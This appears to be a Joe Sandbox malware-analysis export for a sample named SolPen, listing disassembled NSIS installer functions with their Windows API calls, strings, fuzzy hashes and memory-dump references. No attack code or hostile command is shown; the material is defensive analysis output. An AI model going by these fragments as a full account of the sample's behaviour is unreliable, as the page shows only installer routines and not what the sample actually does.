Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

RichEd32, xrefs: 00405BA8
B%F, xrefs: 00405A1F
RichEd20, xrefs: 00405B9D
RichEdit, xrefs: 00405BC4
@rD, xrefs: 00405965
.exe, xrefs: 00405A3D
_Nb, xrefs: 00405AD1
.DEFAULT\Control Panel\International, xrefs: 00405999
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
RichEdit20A, xrefs: 00405BB6, 00405BBB
@%F, xrefs: 004059F6

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,%FluxMerit%,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,%FluxMerit%,%FluxMerit%,00000000,00000000,%FluxMerit%,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: error creating "%s", xrefs: 00401AF0
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user abort, xrefs: 00401B53
File: error, user retry, xrefs: 00401B40
%FluxMerit%, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user cancel, xrefs: 00401B93
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: %FluxMerit%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-3812887870
Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Null, xrefs: 0040367E
soft, xrefs: 00403675
Error launching installer, xrefs: 004035D7
Inst, xrefs: 0040366C
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

X1C, xrefs: 0040343C
P1B, xrefs: 004033A9
... %d%%, xrefs: 0040349E
X1C, xrefs: 004033ED

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(00000000), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8
%FluxMerit%, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: %FluxMerit%$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-1696118852
Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(00000000), ref: 00402387

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713
%FluxMerit%, xrefs: 00402770

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: %FluxMerit%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-483008819
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
